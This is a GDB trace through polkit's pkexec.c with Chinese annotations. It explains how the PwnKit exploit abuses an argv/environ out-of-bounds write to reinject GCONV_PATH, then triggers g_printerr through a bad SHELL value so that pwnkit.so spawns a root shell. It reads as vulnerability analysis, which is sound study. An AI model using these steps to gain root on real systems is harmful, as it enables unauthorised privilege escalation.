Breakpoint
1
, main (argc
=
0
, argv
=
0x7ffe2d2d4e58
) at pkexec.c:
406
406
const gchar
*
environment_variables_to_save[]
=
{
Breakpoint
2
at
0x55d64339bed6
:
file
pkexec.c, line
900.
Stepping until end of main @ pkexec.c:
386
442
ret
=
127
;
443
authority
=
NULL;
444
subject
=
NULL;
445
details
=
NULL;
446
result
=
NULL;
447
action_id
=
NULL;
448
saved_env
=
NULL;
449
path
=
NULL;
450
command_line
=
NULL;
451
opt_user
=
NULL;
452
local_agent_handle
=
NULL;
455
if
(geteuid () !
=
0
)
461
original_user_name
=
g_strdup (g_get_user_name ());
462
if
(original_user_name
=
=
NULL)
468
if
(getcwd (original_cwd, sizeof (original_cwd))
=
=
NULL)
478
opt_show_help
=
FALSE;
479
opt_show_version
=
FALSE;
480
opt_disable_internal_agent
=
FALSE;
481
for
(n
=
1
; n < (guint) argc; n
+
+
)
/
/
n被赋值为
1
512
if
(opt_show_help)
518
else
if
(opt_show_version)
525
if
(opt_user
=
=
NULL)
-
-
Type
<RET>
for
more, q to quit, c to
continue
without paging
-
-
526
opt_user
=
g_strdup (
"root"
);
536
g_assert (argv[argc]
=
=
NULL);
537
path
=
g_strdup (argv[n]);
/
/
越界读,path被赋值为 argv[
1
],即 environ[
0
],
"pwnkit.so:."
538
if
(path
=
=
NULL)
543
if
(path[
0
] !
=
'/'
)
546
s
=
g_find_program_in_path (path);
/
/
在环境变量PATH中寻找
"pwnkit.so:."
,并把路径返回给 s。利用脚本中把PATH设置为
"GCONV_PATH=."
,且在磁盘上提前生成了名为
"GCONV_PATH=."
的文件夹,并放置了名为
"pwnkit.so:."
的程序,因此,s被赋值
"GCONV_PATH=./pwnkit.so:."
。
547
if
(s
=
=
NULL)
552
g_free (path);
553
argv[n]
=
path
=
s;
/
/
越界写,argv[
1
]被设置为
"GCONV_PATH=./pwnkit.so:."
,即environ[
0
] 被修改,重新引入了不安全的环境变量GCONV_PATH,至此完成了至关重要的一步。接下来只要随便构造个错误,使其报错时调用到 g_printerr 即可。
555
if
(access (path, F_OK) !
=
0
)
560
command_line
=
g_strjoinv (
" "
, argv
+
n);
561
exec_argv
=
argv
+
n;
566
rc
=
getpwnam_r (opt_user, &pwstruct, pwbuf, sizeof pwbuf, &pw);
567
if
(rc
=
=
0
&& pw
=
=
NULL)
572
else
if
(pw
=
=
NULL)
579
saved_env
=
g_ptr_array_new ();
580
for
(n
=
0
; environment_variables_to_save[n] !
=
NULL; n
+
+
)
582
const gchar
*
key
=
environment_variables_to_save[n];
585
value
=
g_getenv (key);
586
if
(value
=
=
NULL)
593
if
(!validate_environment_variable (key, value))
/
/
key
=
"SHELL"
, value
=
"/lol/i/do/not/exists"
,在校验环境变量时报错
"The value for the SHELL variable was not found the /etc/shells file"
,进而调用了 g_printerr ,触发漏洞利用,最终执行pwnkit.so里的execve(
"/bin/sh"
, args, environ)得到shell。
process
11852
is
executing new program:
/
usr
/
bin
/
dash
Error
in
re
-
setting breakpoint
1
: Function
"main"
not
defined.
Error
in
re
-
setting breakpoint
2
: No source
file
named
/
home
/
kali
/
software
/
release
/
polkit
-
0.105
/
src
/
programs
/
pkexec.c.